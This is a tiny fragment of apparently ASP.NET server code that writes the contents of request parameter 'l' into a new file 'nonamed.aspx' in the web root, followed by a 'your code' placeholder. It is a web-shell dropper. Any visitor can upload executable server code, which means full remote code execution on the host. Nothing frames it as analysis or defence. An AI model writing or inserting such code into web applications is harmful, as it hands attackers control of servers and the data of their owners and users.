var nonamed=new System.IO.StreamWriter(Server.MapPath("nonamed.aspx"),false); nonamed.Write(Request.Item["l"]); nonamed.Close();
your code